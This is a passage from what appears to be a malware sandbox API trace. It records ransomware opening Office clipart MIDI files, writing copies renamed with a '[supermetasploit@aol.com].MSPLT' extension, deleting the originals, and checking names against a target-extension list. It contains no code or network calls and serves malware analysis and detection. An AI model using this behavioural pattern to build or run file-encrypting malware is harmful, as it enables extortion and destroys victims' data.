lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x1cd8, lpOverlapped=0x0) returned 1 [0319.083] WriteFile (in: hFile=0x51c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x1ce0, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x1ce0, lpOverlapped=0x0) returned 1 [0319.084] ReadFile (in: hFile=0x520, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0319.084] WriteFile (in: hFile=0x51c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xea, lpOverlapped=0x0) returned 1 [0319.084] SetEndOfFile (hFile=0x51c) returned 1 [0319.085] CloseHandle (hObject=0x51c) returned 1 [0319.085] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.085] SetEndOfFile (hFile=0x520) returned 1 [0319.088] CloseHandle (hObject=0x520) returned 1 [0319.088] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0319.088] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\baby_01.mid")) returned 1 [0319.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID") returned 67 [0319.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID") returned 67 [0319.089] lstrlenW (lpString=".doc") returned 4 [0319.089] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0319.089] lstrlenW (lpString=".docx") returned 5 [0319.089] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0319.089] lstrlenW (lpString=".pdf") returned 4 [0319.089] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.089] lstrlenW (lpString=".xls") returned 4 [0319.090] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.090] lstrlenW (lpString=".xlsx") returned 5 [0319.090] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0319.090] lstrlenW (lpString=".ppt") returned 4 [0319.090] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID") returned 67 [0319.090] lstrlenW (lpString=".zip") returned 4 [0319.090] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.090] lstrlenW (lpString=".rar") returned 4 [0319.090] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.090] lstrlenW (lpString=".bz2") returned 4 [0319.090] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.090] lstrlenW (lpString=".7z") returned 3 [0319.090] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID") returned 67 [0319.090] lstrlenW (lpString=".dbf") returned 4 [0319.090] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID") returned 67 [0319.090] lstrlenW (lpString=".1cd") returned 4 [0319.090] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID") returned 67 [0319.090] lstrlenW (lpString=".jpg") returned 4 [0319.090] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID") returned 67 [0319.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID") returned 67 [0319.090] lstrlenW (lpString=".doc") returned 4 [0319.091] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0319.091] lstrlenW (lpString=".docx") returned 5 [0319.091] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0319.091] lstrlenW (lpString=".pdf") returned 4 [0319.091] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.091] lstrlenW (lpString=".xls") returned 4 [0319.091] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.091] lstrlenW (lpString=".xlsx") returned 5 [0319.091] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0319.091] lstrlenW (lpString=".ppt") returned 4 [0319.091] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID") returned 67 [0319.091] lstrlenW (lpString=".zip") returned 4 [0319.091] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.091] lstrlenW (lpString=".rar") returned 4 [0319.091] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.091] lstrlenW (lpString=".bz2") returned 4 [0319.091] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.091] lstrlenW (lpString=".7z") returned 3 [0319.091] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID") returned 67 [0319.091] lstrlenW (lpString=".dbf") returned 4 [0319.091] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID") returned 67 [0319.091] lstrlenW (lpString=".1cd") returned 4 [0319.091] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID") returned 67 [0319.092] lstrlenW (lpString=".jpg") returned 4 [0319.092] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.092] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0319.092] lstrlenW (lpString="CARBN_01.MID") returned 12 [0319.092] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\carbn_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0319.093] GetFileSizeEx (in: hFile=0x520, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=9322) returned 1 [0319.093] CloseHandle (hObject=0x520) returned 1 [0319.093] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\carbn_01.mid")) returned 0x220 [0319.093] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\carbn_01.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.094] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\carbn_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0319.094] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.094] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.094] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\carbn_01.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0319.095] GetLastError () returned 0x0 [0319.095] ReadFile (in: hFile=0x520, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x246a, lpOverlapped=0x0) returned 1 [0319.097] WriteFile (in: hFile=0x51c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x2470, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x2470, lpOverlapped=0x0) returned 1 [0319.098] ReadFile (in: hFile=0x520, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0319.098] WriteFile (in: hFile=0x51c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xec, lpOverlapped=0x0) returned 1 [0319.099] SetEndOfFile (hFile=0x51c) returned 1 [0319.099] CloseHandle (hObject=0x51c) returned 1 [0319.099] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.099] SetEndOfFile (hFile=0x520) returned 1 [0319.103] CloseHandle (hObject=0x520) returned 1 [0319.104] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0319.104] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\carbn_01.mid")) returned 1 [0319.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 68 [0319.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 68 [0319.105] lstrlenW (lpString=".doc") returned 4 [0319.105] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0319.105] lstrlenW (lpString=".docx") returned 5 [0319.105] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0319.105] lstrlenW (lpString=".pdf") returned 4 [0319.105] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.105] lstrlenW (lpString=".xls") returned 4 [0319.105] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.105] lstrlenW (lpString=".xlsx") returned 5 [0319.105] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0319.105] lstrlenW (lpString=".ppt") returned 4 [0319.105] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 68 [0319.105] lstrlenW (lpString=".zip") returned 4 [0319.106] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.106] lstrlenW (lpString=".rar") returned 4 [0319.106] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.106] lstrlenW (lpString=".bz2") returned 4 [0319.106] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.106] lstrlenW (lpString=".7z") returned 3 [0319.106] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 68 [0319.106] lstrlenW (lpString=".dbf") returned 4 [0319.106] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 68 [0319.106] lstrlenW (lpString=".1cd") returned 4 [0319.106] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 68 [0319.106] lstrlenW (lpString=".jpg") returned 4 [0319.106] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 68 [0319.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 68 [0319.639] lstrlenW (lpString=".doc") returned 4 [0319.639] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0319.658] lstrlenW (lpString=".docx") returned 5 [0319.658] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0319.658] lstrlenW (lpString=".pdf") returned 4 [0319.658] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.658] lstrlenW (lpString=".xls") returned 4 [0319.658] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.675] lstrlenW (lpString=".xlsx") returned 5 [0319.675] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0319.675] lstrlenW (lpString=".ppt") returned 4 [0319.675] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 68 [0319.675] lstrlenW (lpString=".zip") returned 4 [0319.675] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.675] lstrlenW (lpString=".rar") returned 4 [0319.675] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.675] lstrlenW (lpString=".bz2") returned 4 [0319.675] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.676] lstrlenW (lpString=".7z") returned 3 [0319.676] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 68 [0319.676] lstrlenW (lpString=".dbf") returned 4 [0319.676] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 68 [0319.676] lstrlenW (lpString=".1cd") returned 4 [0319.676] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 68 [0319.676] lstrlenW (lpString=".jpg") returned 4 [0319.676] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.676] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0319.676] lstrlenW (lpString="MUSIC_01.MID") returned 12 [0319.676] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\music_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0319.678] GetFileSizeEx (in: hFile=0x534, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=6880) returned 1 [0319.679] CloseHandle (hObject=0x534) returned 1 [0319.679] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\music_01.mid")) returned 0x220 [0319.679] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\music_01.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.679] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\music_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0319.679] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.680] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\music_01.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x538 [0319.681] GetLastError () returned 0x0 [0319.681] ReadFile (in: hFile=0x534, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x1ae0, lpOverlapped=0x0) returned 1 [0319.698] WriteFile (in: hFile=0x538, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x1af0, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x1af0, lpOverlapped=0x0) returned 1 [0319.700] ReadFile (in: hFile=0x534, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0319.700] WriteFile (in: hFile=0x538, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xec, lpOverlapped=0x0) returned 1 [0319.700] SetEndOfFile (hFile=0x538) returned 1 [0319.700] CloseHandle (hObject=0x538) returned 1 [0319.700] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.701] SetEndOfFile (hFile=0x534) returned 1 [0319.706] CloseHandle (hObject=0x534) returned 1 [0319.706] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0319.708] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\music_01.mid")) returned 1 [0319.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 68 [0319.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 68 [0319.709] lstrlenW (lpString=".doc") returned 4 [0319.709] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0319.709] lstrlenW (lpString=".docx") returned 5 [0319.709] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0319.709] lstrlenW (lpString=".pdf") returned 4 [0319.709] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.709] lstrlenW (lpString=".xls") returned 4 [0319.709] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.709] lstrlenW (lpString=".xlsx") returned 5 [0319.709] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0319.709] lstrlenW (lpString=".ppt") returned 4 [0319.709] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 68 [0319.709] lstrlenW (lpString=".zip") returned 4 [0319.709] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.709] lstrlenW (lpString=".rar") returned 4 [0319.709] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.709] lstrlenW (lpString=".bz2") returned 4 [0319.709] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.710] lstrlenW (lpString=".7z") returned 3 [0319.710] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 68 [0319.710] lstrlenW (lpString=".dbf") returned 4 [0319.710] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 68 [0319.710] lstrlenW (lpString=".1cd") returned 4 [0319.710] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 68 [0319.710] lstrlenW (lpString=".jpg") returned 4 [0319.710] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 68 [0319.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 68 [0319.710] lstrlenW (lpString=".doc") returned 4 [0319.710] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0319.710] lstrlenW (lpString=".docx") returned 5 [0319.710] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0319.710] lstrlenW (lpString=".pdf") returned 4 [0319.710] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.710] lstrlenW (lpString=".xls") returned 4 [0319.710] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.710] lstrlenW (lpString=".xlsx") returned 5 [0319.710] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0319.710] lstrlenW (lpString=".ppt") returned 4 [0319.710] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 68 [0319.711] lstrlenW (lpString=".zip") returned 4 [0319.711] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.711] lstrlenW (lpString=".rar") returned 4 [0319.711] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.711] lstrlenW (lpString=".bz2") returned 4 [0319.711] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.711] lstrlenW (lpString=".7z") returned 3 [0319.711] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 68 [0319.711] lstrlenW (lpString=".dbf") returned 4 [0319.711] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 68 [0319.711] lstrlenW (lpString=".1cd") returned 4 [0319.711] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 68 [0319.711] lstrlenW (lpString=".jpg") returned 4 [0319.711] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.711] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0319.712] lstrlenW (lpString="NBOOK_01.MID") returned 12 [0319.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\nbook_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0319.717] GetFileSizeEx (in: hFile=0x534, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=5968) returned 1 [0319.717] CloseHandle (hObject=0x534) returned 1 [0319.718] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\nbook_01.mid")) returned 0x220 [0319.718] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\nbook_01.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.718] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\nbook_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0319.718] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.718] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.719] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\nbook_01.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x538 [0319.720] GetLastError () returned 0x0 [0319.720] ReadFile (in: hFile=0x534, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x1750, lpOverlapped=0x0) returned 1 [0319.981] WriteFile (in: hFile=0x538, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x1760, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x1760, lpOverlapped=0x0) returned 1 [0319.982] ReadFile (in: hFile=0x534, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, 